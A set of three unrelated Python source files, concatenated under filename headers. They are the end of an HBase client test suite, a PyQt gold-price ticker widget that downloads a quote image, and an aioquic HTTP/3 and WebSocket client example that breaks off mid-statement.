    row = 'row-with-counter'
    column = 'cf1:counter'
    assert_equal(0, table.counter_get(row, column))
    assert_equal(10, table.counter_inc(row, column, 10))
    assert_equal(10, table.counter_get(row, column))
    table.counter_set(row, column, 0)
    assert_equal(1, table.counter_inc(row, column))
    assert_equal(4, table.counter_inc(row, column, 3))
    assert_equal(4, table.counter_get(row, column))
    table.counter_set(row, column, 3)
    assert_equal(3, table.counter_get(row, column))
    assert_equal(8, table.counter_inc(row, column, 5))
    # Negative deltas decrement; counter_dec mirrors counter_inc
    assert_equal(6, table.counter_inc(row, column, -2))
    assert_equal(5, table.counter_dec(row, column))
    assert_equal(3, table.counter_dec(row, column, 2))
    assert_equal(10, table.counter_dec(row, column, -7))
def test_batch():
    """Batches validate arguments and apply puts/deletes on send()."""
    with assert_raises(TypeError):
        table.batch(timestamp='invalid')
    b = table.batch()
    b.put('row1', {'cf1:col1': 'value1',
                   'cf1:col2': 'value2'})
    b.put('row2', {'cf1:col1': 'value1',
                   'cf1:col2': 'value2',
                   'cf1:col3': 'value3'})
    b.delete('row1', ['cf1:col4'])
    b.delete('another-row')
    b.send()
    b = table.batch(timestamp=1234567)
    b.put('row1', {'cf1:col5': 'value5'})
    b.send()
    with assert_raises(ValueError):
        b = table.batch(batch_size=0)
    with assert_raises(TypeError):
        b = table.batch(transaction=True, batch_size=10)
def test_batch_context_managers():
    """Batches used as context managers flush on exit and honour the
    transaction flag when the body raises."""
    with table.batch() as b:
        b.put('row4', {'cf1:col3': 'value3'})
        b.put('row5', {'cf1:col4': 'value4'})
        b.put('row', {'cf1:col1': 'value1'})
        b.delete('row', ['cf1:col4'])
        b.put('row', {'cf1:col2': 'value2'})
    with table.batch(timestamp=87654321) as b:
        b.put('row', {'cf1:c3': 'somevalue',
                      'cf1:c5': 'anothervalue'})
        b.delete('row', ['cf1:c3'])
    # transaction=True: an exception discards the pending mutations
    with assert_raises(ValueError):
        with table.batch(transaction=True) as b:
            b.put('fooz', {'cf1:bar': 'baz'})
            raise ValueError
    assert_dict_equal({}, table.row('fooz', ['cf1:bar']))
    # transaction=False: pending mutations are flushed despite the exception
    with assert_raises(ValueError):
        with table.batch(transaction=False) as b:
            b.put('fooz', {'cf1:bar': 'baz'})
            raise ValueError
    assert_dict_equal({'cf1:bar': 'baz'}, table.row('fooz', ['cf1:bar']))
    with table.batch(batch_size=5) as b:
        for i in xrange(10):
            b.put('row-batch1-%03d' % i, {'cf1:': str(i)})
    with table.batch(batch_size=20) as b:
        for i in xrange(95):
            b.put('row-batch2-%03d' % i, {'cf1:': str(i)})
    assert_equal(95, len(list(table.scan(row_prefix='row-batch2-'))))
    with table.batch(batch_size=20) as b:
        for i in xrange(95):
            b.delete('row-batch2-%03d' % i)
    assert_equal(0, len(list(table.scan(row_prefix='row-batch2-'))))
def test_row():
    """row() filters by family/column/timestamp and can include timestamps."""
    row = table.row
    put = table.put
    row_key = 'row-test'
    with assert_raises(TypeError):
        row(row_key, 123)
    with assert_raises(TypeError):
        row(row_key, timestamp='invalid')
    put(row_key, {'cf1:col1': 'v1old'}, timestamp=1234)
    put(row_key, {'cf1:col1': 'v1new'}, timestamp=3456)
    put(row_key, {'cf1:col2': 'v2',
                  'cf2:col1': 'v3'})
    put(row_key, {'cf2:col2': 'v4'}, timestamp=1234)
    exp = {'cf1:col1': 'v1new',
           'cf1:col2': 'v2',
           'cf2:col1': 'v3',
           'cf2:col2': 'v4'}
    assert_dict_equal(exp, row(row_key))
    exp = {'cf1:col1': 'v1new',
           'cf1:col2': 'v2'}
    assert_dict_equal(exp, row(row_key, ['cf1']))
    exp = {'cf1:col1': 'v1new',
           'cf2:col2': 'v4'}
    assert_dict_equal(exp, row(row_key, ['cf1:col1', 'cf2:col2']))
    # timestamp=N returns the latest values strictly older than N
    exp = {'cf1:col1': 'v1old',
           'cf2:col2': 'v4'}
    assert_dict_equal(exp, row(row_key, timestamp=2345))
    assert_dict_equal({}, row(row_key, timestamp=123))
    res = row(row_key, include_timestamp=True)
    assert_equal(len(res), 4)
    assert_equal('v1new', res['cf1:col1'][0])
    assert_is_instance(res['cf1:col1'][1], int)
def test_rows():
    """rows() fetches multiple row keys, optionally bounded by timestamp."""
    row_keys = ['rows-row1', 'rows-row2', 'rows-row3']
    data_old = {'cf1:col1': 'v1old', 'cf1:col2': 'v2old'}
    data_new = {'cf1:col1': 'v1new', 'cf1:col2': 'v2new'}
    with assert_raises(TypeError):
        table.rows(row_keys, object())
    with assert_raises(TypeError):
        table.rows(row_keys, timestamp='invalid')
    for row_key in row_keys:
        table.put(row_key, data_old, timestamp=4000)
    for row_key in row_keys:
        table.put(row_key, data_new)
    assert_dict_equal({}, table.rows([]))
    rows = dict(table.rows(row_keys))
    for row_key in row_keys:
        assert_in(row_key, rows)
        assert_dict_equal(data_new, rows[row_key])
    rows = dict(table.rows(row_keys, timestamp=5000))
    for row_key in row_keys:
        assert_in(row_key, rows)
        assert_dict_equal(data_old, rows[row_key])
def test_cells():
    """cells() returns versions newest-first, with validation and timestamps."""
    row_key = 'cell-test'
    col = 'cf1:col1'
    table.put(row_key, {col: 'old'}, timestamp=1234)
    table.put(row_key, {col: 'new'})
    with assert_raises(TypeError):
        table.cells(row_key, col, versions='invalid')
    with assert_raises(TypeError):
        table.cells(row_key, col, versions=3, timestamp='invalid')
    with assert_raises(ValueError):
        table.cells(row_key, col, versions=0)
    results = table.cells(row_key, col, versions=1)
    assert_equal(len(results), 1)
    assert_equal('new', results[0])
    results = table.cells(row_key, col)
    assert_equal(len(results), 2)
    assert_equal('new', results[0])
    assert_equal('old', results[1])
    results = table.cells(row_key, col, timestamp=2345, include_timestamp=True)
    assert_equal(len(results), 1)
    assert_equal('old', results[0][0])
    assert_equal(1234, results[0][1])
def test_scan():
    """Exercise scan(): argument validation, ranges, prefixes, limits,
    batch sizes, timestamps and explicit scanner close."""
    with assert_raises(TypeError):
        list(table.scan(row_prefix='foobar', row_start='xyz'))
    with assert_raises(ValueError):
        list(table.scan(batch_size=None))
    if connection.compat == '0.90':
        with assert_raises(NotImplementedError):
            list(table.scan(filter='foo'))
    with assert_raises(ValueError):
        list(table.scan(limit=0))
    with assert_raises(TypeError):
        list(table.scan(row_start='foobar', row_prefix='foo'))
    with table.batch() as b:
        for i in range(2000):
            b.put('row-scan-a%05d' % i,
                  {'cf1:col1': 'v1',
                   'cf1:col2': 'v2',
                   'cf2:col1': 'v1',
                   'cf2:col2': 'v2'})
            b.put('row-scan-b%05d' % i,
                  {'cf1:col1': 'v1',
                   'cf1:col2': 'v2'})
    def calc_len(scanner):
        # Consume the scanner, keeping only the last (index, item) pair,
        # so the count is obtained without materialising all rows
        d = collections.deque(maxlen=1)
        d.extend(enumerate(scanner, 1))
        if d:
            return d[0][0]
        return 0
    scanner = table.scan(row_start='row-scan-a00012',
                         row_stop='row-scan-a00022')
    assert_equal(10, calc_len(scanner))
    scanner = table.scan(row_start='xyz')
    assert_equal(0, calc_len(scanner))
    scanner = table.scan(row_start='xyz', row_stop='zyx')
    assert_equal(0, calc_len(scanner))
    scanner = table.scan(row_start='row-scan-', row_stop='row-scan-a999',
                         columns=['cf1:col1', 'cf2:col2'])
    row_key, row = next(scanner)
    assert_equal(row_key, 'row-scan-a00000')
    assert_dict_equal(row, {'cf1:col1': 'v1',
                            'cf2:col2': 'v2'})
    assert_equal(2000 - 1, calc_len(scanner))
    scanner = table.scan(row_prefix='row-scan-a', batch_size=499, limit=1000)
    assert_equal(1000, calc_len(scanner))
    scanner = table.scan(row_prefix='row-scan-b', batch_size=1, limit=10)
    assert_equal(10, calc_len(scanner))
    scanner = table.scan(row_prefix='row-scan-b', batch_size=5, limit=10)
    assert_equal(10, calc_len(scanner))
    scanner = table.scan(timestamp=123)
    assert_equal(0, calc_len(scanner))
    scanner = table.scan(row_prefix='row', timestamp=123)
    assert_equal(0, calc_len(scanner))
    scanner = table.scan(batch_size=20)
    next(scanner)
    next(scanner)
    scanner.close()
    with assert_raises(StopIteration):
        next(scanner)
def test_scan_sorting():
    """sorted_columns=True yields each row's columns in sorted order
    (only supported on HBase >= 0.96)."""
    if connection.compat < '0.96':
        return  # not supported
    input_row = {}
    for i in xrange(100):
        input_row['cf1:col-%03d' % i] = ''
    input_key = 'row-scan-sorted'
    table.put(input_key, input_row)
    scan = table.scan(row_start=input_key, sorted_columns=True)
    key, row = next(scan)
    assert_equal(key, input_key)
    assert_list_equal(
        sorted(input_row.items()),
        row.items())
def test_scan_filter_and_batch_size():
    """Regression test: a server-side filter must work together with the
    scanner's batching.

    See issue #54 and #56.
    """
    # Named 'flt' so the local does not shadow the builtin 'filter';
    # it is still passed as the 'filter' keyword of scan().
    flt = "SingleColumnValueFilter ('cf1', 'qual1', =, 'binary:val1')"
    for k, v in table.scan(filter=flt):
        # print(v) is equivalent to the old 'print v' statement in Python 2
        # (parentheses around a single expression are a no-op) and is also
        # valid Python 3 syntax.
        print(v)
def test_delete():
    """Exercise cell-level, column-level and whole-row deletes, with and
    without an explicit timestamp."""
    row_key = 'row-test-delete'
    data = {'cf1:col1': 'v1',
            'cf1:col2': 'v2',
            'cf1:col3': 'v3'}
    # Write an older version of col2 first, then the current values.
    table.put(row_key, {'cf1:col2': 'v2old'}, timestamp=1234)
    table.put(row_key, data)

    # Delete col2 versions up to ts=2345: removes 'v2old' only, so exactly
    # one version of col2 remains and the visible row still equals 'data'.
    table.delete(row_key, ['cf1:col2'], timestamp=2345)
    assert_equal(1, len(table.cells(row_key, 'cf1:col2', versions=2)))
    assert_dict_equal(data, table.row(row_key))

    # Delete col1 entirely (no timestamp): only col1 disappears.
    table.delete(row_key, ['cf1:col1'])
    res = table.row(row_key)
    assert_not_in('cf1:col1', res)
    assert_in('cf1:col2', res)
    assert_in('cf1:col3', res)

    # Row delete bounded at ts=12345 must not remove the newer cells.
    table.delete(row_key, timestamp=12345)
    res = table.row(row_key)
    assert_in('cf1:col2', res)
    assert_in('cf1:col3', res)

    # Unbounded row delete empties the row.
    table.delete(row_key)
    assert_dict_equal({}, table.row(row_key))
def test_connection_pool_construction():
    """Invalid pool sizes must be rejected at construction time."""
    # A non-integer size is a TypeError...
    with assert_raises(TypeError):
        ConnectionPool(size='abc')
    # ...and a non-positive size is a ValueError.
    with assert_raises(ValueError):
        ConnectionPool(size=0)
def test_connection_pool():
    """Stress the connection pool from several threads while injecting
    random transport failures; broken connections must be replaced by
    the pool."""
    from thrift.transport.TTransport import TTransportException

    def run():
        name = threading.current_thread().name
        print "Thread %s starting" % name

        def inner_function():
            # Nested connection requests must return the same connection
            with pool.connection() as another_connection:
                assert connection is another_connection

            # Fake an exception once in a while
            if random.random() < .25:
                print "Introducing random failure"
                connection.transport.close()
                raise TTransportException("Fake transport exception")

        for i in xrange(50):
            with pool.connection() as connection:
                connection.tables()

                try:
                    inner_function()
                except TTransportException:
                    # This error should have been picked up by the
                    # connection pool, and the connection should have
                    # been replaced by a fresh one
                    pass

                # Must still work after the pool swapped the connection.
                connection.tables()

        print "Thread %s done" % name

    N_THREADS = 10
    pool = ConnectionPool(size=3, **connection_kwargs)
    threads = [threading.Thread(target=run) for i in xrange(N_THREADS)]
    for t in threads:
        t.start()

    # Poll with short joins so progress can be reported while waiting.
    while threads:
        for t in threads:
            t.join(timeout=.1)

        # filter out finished threads
        threads = [t for t in threads if t.is_alive()]
        print "%d threads still alive" % len(threads)
def test_pool_exhaustion():
    """A second thread must fail to obtain a connection while the pool's
    only connection is held by the main thread."""
    pool = ConnectionPool(size=1, **connection_kwargs)

    def run():
        # NOTE(review): this assertion executes on a worker thread; if it
        # fails, the test runner will not observe the failure — confirm
        # this is acceptable for this suite.
        with assert_raises(NoConnectionsAvailable):
            with pool.connection(timeout=.1) as connection:
                connection.tables()

    with pool.connection():
        # At this point the only connection is assigned to this thread,
        # so another thread cannot obtain a connection at this point.
        t = threading.Thread(target=run)
        t.start()
        t.join()
if __name__ == '__main__':
    import logging
    import sys

    # Dump stacktraces using 'kill -USR1', useful for debugging hanging
    # programs and multi threading issues.
    try:
        import faulthandler
    except ImportError:
        pass
    else:
        import signal
        faulthandler.register(signal.SIGUSR1)

    logging.basicConfig(level=logging.DEBUG)

    # Run exactly one test, selected by its suffix on the command line,
    # e.g. "scan" runs test_scan(). Raises KeyError for unknown names.
    method_name = 'test_%s' % sys.argv[1]
    method = globals()[method_name]
    method()
|
goldticker.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import csv
import sys, traceback
import threading
import time
import urllib2
from PyQt4 import QtGui,QtCore
from boardlet import Boardlet
from modellet import Modellet
class GoldTicker(Boardlet):
    """Boardlet that periodically downloads a gold-rate image and paints it
    with near-black pixels rendered transparent."""

    def __init__(self, parent):
        super(GoldTicker, self).__init__(parent)
        self.p_model = GoldRate()
        self.fubar()

    def fubar(self):
        # NOTE(review): despite the name, this is the UI-initialization
        # routine; consider renaming.
        super(GoldTicker, self).initUI()
        self.p_icon = QtGui.QLabel(self)
        self.p_icon.setGeometry(self.b_imgx(), self.b_imgy(),
                                self.b_iconwidth(), self.b_iconheight())
        self.p_icon.setPixmap(QtGui.QPixmap(os.getcwd() + '/img/gold.png'))
        # Daemon refresh thread: dies with the application instead of
        # blocking interpreter exit.
        t = threading.Thread(target=self.periodicUpdate)
        t.setDaemon(True)
        t.start()

    def paintEvent(self, e):
        super(GoldTicker, self).paintEvent(e)
        # Nothing to draw until the first download has completed.
        if None == self.p_model.getData():
            return
        try:
            source = QtGui.QImage()
            source.loadFromData(self.p_model.getData())
            # Keep only the top 100 pixel rows of the downloaded image.
            source = source.copy(0, 0, source.width(), 100)
            # substitute 'black' pixels with transparent
            dest = QtGui.QImage(source.width(), source.height(),
                                QtGui.QImage.Format_ARGB32)
            qp = QtGui.QPainter()
            qp.begin(dest)
            # NOTE(review): per-pixel Python loop on every paint event is
            # slow; a cached converted image would avoid repeating it.
            for col in xrange(0, source.width()):
                for row in xrange(0, source.height()):
                    pel = QtGui.QColor(source.pixel(col, row))
                    if pel.red() < 10 and pel.green() < 10 and pel.blue() < 10:
                        dest.setPixel(col, row, QtGui.qRgba(0, 0, 0, 0))
                    else:
                        dest.setPixel(col, row, pel.rgba())
            qp.end()
            # draw on screen
            qp = QtGui.QPainter()
            qp.begin(self)
            qp.drawImage(self.b_col1x(), self.b_imgy(), dest)
            qp.end()
        except Exception:
            # Log the full traceback but keep the widget alive.
            exc_type, exc_value, exc_traceback = sys.exc_info()
            lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
            print ''.join('!! ' + line for line in lines)

    def periodicUpdate(self):
        # Refresh loop run on the daemon thread started in fubar().
        while(True):
            st = self.getNextWaitTimeSeconds()
            self.p_model.doRefresh()
            time.sleep(st)
class GoldRate(Modellet):
    """Model that downloads the kitconet gold-quote GIF and caches its raw
    bytes for the ticker widget to render."""

    def __init__(self):
        super(GoldRate, self).__init__()
        # Raw GIF bytes of the last successful download; None until then.
        self.p_imgdata = None

    def getData(self):
        # Returns None before the first successful refresh.
        return self.p_imgdata

    def doRefresh(self):
        """Fetch the quote image; on failure keep the stale data and raise
        the model's fault flag."""
        url = 'http://www.kitconet.com/images/quotes_special.gif'
        try:
            self.p_imgdata = urllib2.urlopen(url).read()
            super(GoldRate, self).setFaultFlag(False)
            super(GoldRate, self).setLastUpdatedNow()
        except Exception:
            exc_type, exc_value, exc_traceback = sys.exc_info()
            lines = traceback.format_exception(exc_type, exc_value, exc_traceback)
            print ''.join('!! ' + line for line in lines)
            super(GoldRate, self).setFaultFlag(True)
|
client_1_(asynchronous).py | import argparse
import asyncio
import json
import logging
import pickle
import ssl
import sys
from sys import stdin
import time
import os
from collections import deque
from typing import Callable, Deque, Dict, List, Optional, Union, cast
from urllib.parse import urlparse
from threading import Thread
import PySimpleGUI as sg
import time
import wsproto
import wsproto.events
import aioquic
from aioquic.asyncio.client import connect
from aioquic.asyncio.protocol import QuicConnectionProtocol
from aioquic.h0.connection import H0_ALPN, H0Connection
from aioquic.h3.connection import H3_ALPN, H3Connection
from aioquic.h3.events import (
DataReceived,
H3Event,
HeadersReceived,
PushPromiseReceived,
)
from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.events import QuicEvent
from aioquic.quic.logger import QuicLogger
# main test params: --ca-certs ../Keys/pycacert.pem https://localhost:4433/
# outside server test params: --print-response https://cloudflare-quic.com/
# opening a websocket: --print-response --ca-certs Keys/pycacert.pem wss://localhost:4433/ws
# uvloop is optional: fall back to the default asyncio event loop when the
# package is not installed (see the uvloop.install() call in __main__).
try:
    import uvloop
except ImportError:
    uvloop = None

logger = logging.getLogger("client")

# Either an HTTP/0.9 or HTTP/3 connection, selected by the negotiated ALPN.
HttpConnection = Union[H0Connection, H3Connection]

USER_AGENT = "aioquic/" + aioquic.__version__
class URL:
    """Split a URL string into the pieces used to build HTTP/3 headers:
    authority (netloc), path+query, and scheme."""

    def __init__(self, url: str):
        parts = urlparse(url)
        self.authority = parts.netloc
        query_suffix = "?" + parts.query if parts.query else ""
        self.full_path = parts.path + query_suffix
        self.scheme = parts.scheme
class HttpRequest:
    """Container describing one outgoing HTTP request.

    Attributes:
        method: HTTP method, e.g. "GET", "POST" or "CONNECT".
        url: parsed URL object (see the URL class).
        content: request body bytes (empty for body-less requests).
        headers: extra header name -> value mapping.
    """

    def __init__(
        self,
        method: str,
        url: "URL",
        content: bytes = b"",
        headers: Optional[Dict] = None,
    ) -> None:
        # 'headers' defaults to None instead of a literal {}: a mutable
        # default would be shared across every HttpRequest created without
        # explicit headers, so mutating one request's headers would leak
        # into all the others.
        self.content = content
        self.headers = headers if headers is not None else {}
        self.method = method
        self.url = url
class WebSocket:
    """Client-side WebSocket carried over a single HTTP/3 stream.

    Outgoing frames are produced by wsproto and written to the stream;
    incoming HTTP/3 events are fed back into wsproto and surfaced as
    text messages on an asyncio queue.
    """

    def __init__(
        self, http: HttpConnection, stream_id: int, transmit: Callable[[], None]
    ) -> None:
        self.http = http
        # Received text messages in arrival order; recv() awaits this queue.
        self.queue: asyncio.Queue[str] = asyncio.Queue()
        self.stream_id = stream_id
        self.subprotocol: Optional[str] = None
        # Callback that flushes pending QUIC data to the network.
        self.transmit = transmit
        self.websocket = wsproto.Connection(wsproto.ConnectionType.CLIENT)

    async def close(self, code=1000, reason="") -> None:
        """
        Perform the closing handshake.
        """
        data = self.websocket.send(
            wsproto.events.CloseConnection(code=code, reason=reason)
        )
        # end_stream=True tells the peer no more frames will follow.
        self.http.send_data(stream_id=self.stream_id, data=data, end_stream=True)
        self.transmit()

    async def recv(self) -> str:
        """
        Receive the next message.
        """
        return await self.queue.get()

    async def send(self, message: str):
        """
        Send a message.
        """
        assert isinstance(message, str)
        data = self.websocket.send(wsproto.events.TextMessage(data=message))
        self.http.send_data(stream_id=self.stream_id, data=data, end_stream=False)
        self.transmit()

    def http_event_received(self, event: H3Event):
        """Feed an HTTP/3 event for this stream into the wsproto machine."""
        if isinstance(event, HeadersReceived):
            for header, value in event.headers:
                # Remember which subprotocol the server accepted, if any.
                if header == b"sec-websocket-protocol":
                    self.subprotocol = value.decode()
        elif isinstance(event, DataReceived):
            self.websocket.receive_data(event.data)
            for ws_event in self.websocket.events():
                self.websocket_event_received(ws_event)

    def websocket_event_received(self, event: wsproto.events.Event) -> None:
        # Only text frames are queued; other frame types are ignored here.
        if isinstance(event, wsproto.events.TextMessage):
            self.queue.put_nowait(event.data)
class HttpClient(QuicConnectionProtocol):
    """QUIC protocol speaking HTTP/0.9 or HTTP/3 on top of the connection.

    Tracks in-flight requests, server pushes and open websockets per
    stream id, and routes incoming HTTP events to the right consumer.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # push_id -> events received for that server push
        self.pushes: Dict[int, Deque[H3Event]] = {}
        self._http: Optional[HttpConnection] = None
        # stream_id -> events accumulated for a pending request
        self._request_events: Dict[int, Deque[H3Event]] = {}
        # stream_id -> future resolved when the response stream ends
        self._request_waiter: Dict[int, asyncio.Future[Deque[H3Event]]] = {}
        self._websockets: Dict[int, WebSocket] = {}
        # "hq-..." ALPN means legacy HTTP/0.9; anything else is HTTP/3.
        if self._quic.configuration.alpn_protocols[0].startswith("hq-"):
            self._http = H0Connection(self._quic)
        else:
            self._http = H3Connection(self._quic)

    async def get(self, url: str, headers: Dict = {}) -> Deque[H3Event]:
        """
        Perform a GET request.
        """
        return await self._request(
            HttpRequest(method="GET", url=URL(url), headers=headers)
        )

    async def post(self, url: str, data: bytes, headers: Dict = {}) -> Deque[H3Event]:
        """
        Perform a POST request.
        """
        return await self._request(
            HttpRequest(method="POST", url=URL(url), content=data, headers=headers)
        )

    async def websocket(self, url: str, subprotocols: List[str] = []) -> WebSocket:
        """
        Open a WebSocket.
        """
        request = HttpRequest(method="CONNECT", url=URL(url))
        stream_id = self._quic.get_next_available_stream_id()
        websocket = WebSocket(
            http=self._http, stream_id=stream_id, transmit=self.transmit
        )
        self._websockets[stream_id] = websocket
        # Extended-CONNECT style handshake headers for a WebSocket upgrade.
        headers = [
            (b":method", b"CONNECT"),
            (b":scheme", b"https"),
            (b":authority", request.url.authority.encode()),
            (b":path", request.url.full_path.encode()),
            (b":protocol", b"websocket"),
            (b"user-agent", USER_AGENT.encode()),
            (b"sec-websocket-version", b"13"),
        ]
        if subprotocols:
            headers.append(
                (b"sec-websocket-protocol", ", ".join(subprotocols).encode())
            )
        self._http.send_headers(stream_id=stream_id, headers=headers)
        self.transmit()
        return websocket

    def http_event_received(self, event: H3Event):
        """Dispatch an HTTP event to the request, websocket or push that
        owns its stream."""
        if isinstance(event, (HeadersReceived, DataReceived)):
            stream_id = event.stream_id
            if stream_id in self._request_events:
                # http
                self._request_events[event.stream_id].append(event)
                if event.stream_ended:
                    # Response complete: resolve the waiter with all events.
                    request_waiter = self._request_waiter.pop(stream_id)
                    request_waiter.set_result(self._request_events.pop(stream_id))
            elif stream_id in self._websockets:
                # websocket
                websocket = self._websockets[stream_id]
                websocket.http_event_received(event)
            elif event.push_id in self.pushes:
                # push
                self.pushes[event.push_id].append(event)
        elif isinstance(event, PushPromiseReceived):
            self.pushes[event.push_id] = deque()
            self.pushes[event.push_id].append(event)

    def quic_event_received(self, event: QuicEvent):
        # pass event to the HTTP layer
        if self._http is not None:
            for http_event in self._http.handle_event(event):
                self.http_event_received(http_event)

    async def _request(self, request: HttpRequest):
        """Send *request* on a fresh stream and await the complete response
        as a deque of H3 events."""
        stream_id = self._quic.get_next_available_stream_id()
        self._http.send_headers(
            stream_id=stream_id,
            headers=[
                (b":method", request.method.encode()),
                (b":scheme", request.url.scheme.encode()),
                (b":authority", request.url.authority.encode()),
                (b":path", request.url.full_path.encode()),
                (b"user-agent", USER_AGENT.encode()),
            ]
            + [(k.encode(), v.encode()) for (k, v) in request.headers.items()],
        )
        self._http.send_data(stream_id=stream_id, data=request.content, end_stream=True)
        waiter = self._loop.create_future()
        self._request_events[stream_id] = deque()
        self._request_waiter[stream_id] = waiter
        self.transmit()
        # shield() so cancellation of the caller does not cancel the waiter
        # that http_event_received() will still try to resolve.
        return await asyncio.shield(waiter)
async def perform_http_request(
    client: HttpClient, url: str, data: str, print_response: bool
) -> None:
    """Issue one GET (or POST when *data* is given) and report timing/size.

    When *print_response* is set, response headers go to stderr and the
    body bytes go to stdout.
    """
    # perform request
    start = time.time()
    if data is not None:
        http_events = await client.post(
            url,
            data=data.encode(),
            headers={"content-type": "application/x-www-form-urlencoded"},
        )
    else:
        http_events = await client.get(url)
    elapsed = time.time() - start

    # print speed (body octets only; headers are not counted)
    octets = 0
    for http_event in http_events:
        if isinstance(http_event, DataReceived):
            octets += len(http_event.data)
    logger.info(
        "Received %d bytes in %.1f s (%.3f Mbps)"
        % (octets, elapsed, octets * 8 / elapsed / 1000000)
    )

    # print response
    if print_response:
        for http_event in http_events:
            if isinstance(http_event, HeadersReceived):
                headers = b""
                for k, v in http_event.headers:
                    headers += k + b": " + v + b"\r\n"
                if headers:
                    sys.stderr.buffer.write(headers + b"\r\n")
                    sys.stderr.buffer.flush()
            elif isinstance(http_event, DataReceived):
                sys.stdout.buffer.write(http_event.data)
                sys.stdout.buffer.flush()
def save_session_ticket(ticket):
    """
    Callback which is invoked by the TLS engine when a new session ticket
    is received.

    NOTE(review): relies on the module-global ``args`` parsed in the
    __main__ block; calling this without that global raises NameError.
    """
    logger.info("New session ticket received")
    print(ticket)
    if args.session_ticket:
        # Persist the ticket so a later run can resume the TLS session.
        with open(args.session_ticket, "wb") as fp:
            pickle.dump(ticket, fp)
def threaded_GUI():
    """Run a minimal PySimpleGUI input window in a blocking event loop.

    Intended to run on its own thread (see the commented-out call in
    run()); currently it only prints what the user typed.
    """
    sg.theme('DarkAmber')   # Add a touch of color
    # All the stuff inside your window.
    layout = [[sg.Text('Some text on Row 1')],
              [sg.Text('Enter something on Row 2'), sg.InputText()],
              [sg.Button('Ok'), sg.Button('Cancel')]]
    # Create the Window
    window = sg.Window('Window Title', layout)
    # Event Loop to process "events" and get the "values" of the inputs
    while True:
        event, values = window.read()
        if event in (None, 'Cancel'):  # if user closes window or clicks cancel
            break
        print('GUI ', values[0])
        #asyncio.run(send_message(ws, values[0]))
    window.close()
async def send_message(ws, message):
    """Forward *message* to the websocket *ws*, awaiting completion."""
    await ws.send(message)
async def run(
    configuration: QuicConfiguration,
    url: str,
    data: str,
    parallel: int,
    print_response: bool,
) -> None:
    """Connect to *url* over QUIC and either chat over a WebSocket
    (wss:// URLs) or perform *parallel* HTTP requests (https:// URLs).

    NOTE(review): the wss branch spawns two run_forever event-loop threads
    that are never stopped or joined, so the process will not exit cleanly
    when the connection closes — confirm whether that is intended.
    """
    # parse URL
    parsed = urlparse(url)
    assert parsed.scheme in (
        "https",
        "wss",
    ), "Only https:// or wss:// URLs are supported."
    if ":" in parsed.netloc:
        host, port_str = parsed.netloc.split(":")
        port = int(port_str)
    else:
        host = parsed.netloc
        port = 443  # default HTTPS port when none was given

    async with connect(
        host,
        port,
        configuration=configuration,
        create_protocol=HttpClient,
        session_ticket_handler=save_session_ticket,
    ) as client:
        client = cast(HttpClient, client)

        if parsed.scheme == "wss":
            ws = await client.websocket(url, subprotocols=["chat", "superchat"])
            #threaded_GUI()
            #print(ws.stream_id)
            #os.system('clear')

            # send some messages and receive reply
            #while input("Type your message: ") != "exit":

            # Helper run on a fresh thread: adopt the loop and serve it
            # forever (never returns).
            def start_loop(loop):
                asyncio.set_event_loop(loop)
                loop.run_forever()

            new_loop = asyncio.new_event_loop()
            t = Thread(target=start_loop, args=(new_loop,))
            t.start()
            # NOTE(review): new_loop is created but nothing is ever
            # scheduled on it (the read_server call below is commented out).
            new_loop2 = asyncio.new_event_loop()
            t2 = Thread(target=start_loop, args=(new_loop2,))
            t2.start()

            # NOTE(review): more_work is never called — dead code.
            def more_work(x):
                print("More work %s" % x)
                time.sleep(x)
                print("Finished more work %s" % x)

            # Print every message the server sends (unused; see loop below).
            async def read_server():
                #ws = await client.websocket(url, subprotocols=["chat", "superchat"])
                while True:
                    messageRec = await ws.recv()
                    print(messageRec)

            # Read lines from stdin and forward them to the server.
            # NOTE(review): stdin.readline() blocks the new_loop2 thread's
            # event loop between messages.
            async def read_user():
                #ws = await client.websocket(url, subprotocols=["chat", "superchat"])
                while True:
                    #("listening to user")
                    message = stdin.readline()
                    await ws.send(message)
                    #print("I sent: "+message)

            #new_loop.call_soon_threadsafe(read_server())
            #new_loop2.call_soon_threadsafe(read_user())
            #asyncio.run_coroutine_threadsafe(read_server(), new_loop)

            # User input is handled on the second loop's thread while this
            # coroutine drains incoming messages on the main loop.
            asyncio.run_coroutine_threadsafe(read_user(), new_loop2)
            while True:
                messageRec = await ws.recv()
                print(messageRec)

            #futures = [...]
            #loop = asyncio.get_event_loop()
            #loop.run_until_complete(asyncio.wait(futures))
            #loop.run_forever(read_server(ws))
            #loop.run_until_complete(read_server(ws))
            #tasks = [asyncio.ensure_future(read_server(ws)),
            #        asyncio.ensure_future(read_user(ws))]
            #loop.run_until_complete(asyncio.gather(*tasks))

            #while True:
                #'.run(read_server(ws))
                #message = stdin.readline()
                #if message == "":
                #    continue
                #else:
                #    await ws.send(message)
                #messageRec = await ws.recv()
                #if messageRec != "":
                #    print("< " + messageRec)

                #message = input("Type your message: ")
                #await ws.send(message)
                #messageRec = await ws.recv()
                #task = [print("< " + messageRec)]
                #await asyncio.wait(task)
                #print("< " + messageRec)

            #await ws.close()
        else:
            # perform request
            coros = [
                perform_http_request(
                    client=client, url=url, data=data, print_response=print_response
                )
                for i in range(parallel)
            ]
            await asyncio.gather(*coros)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="HTTP/3 client")
parser.add_argument("url", type=str, help="the URL to query (must be HTTPS)")
parser.add_argument(
"--ca-certs", type=str, help="load CA certificates from the specified file"
)
parser.add_argument(
"-d", "--data", type=str, help="send the specified data in a POST request"
)
parser.add_argument(
"-k",
"--insecure",
action="store_true",
help="do not validate server certificate",
)
parser.add_argument("--legacy-http", action="store_true", help="use HTTP/0.9")
parser.add_argument(
"-q", "--quic-log", type=str, help="log QUIC events to a file in QLOG format"
)
parser.add_argument(
"-l",
"--secrets-log",
type=str,
help="log secrets to a file, for use with Wireshark",
)
parser.add_argument(
"--parallel", type=int, default=1, help="perform this many requests in parallel"
)
parser.add_argument(
"--print-response", action="store_true", help="print response headers and body"
)
parser.add_argument(
"-s",
"--session-ticket",
type=str,
help="read and write session ticket from the specified file",
)
parser.add_argument(
"-v", "--verbose", action="store_true", help="increase logging verbosity"
)
args = parser.parse_args()
logging.basicConfig(
format="%(asctime)s %(levelname)s %(name)s %(message)s",
level=logging.DEBUG if args.verbose else logging.INFO,
)
# prepare configuration
configuration = QuicConfiguration(
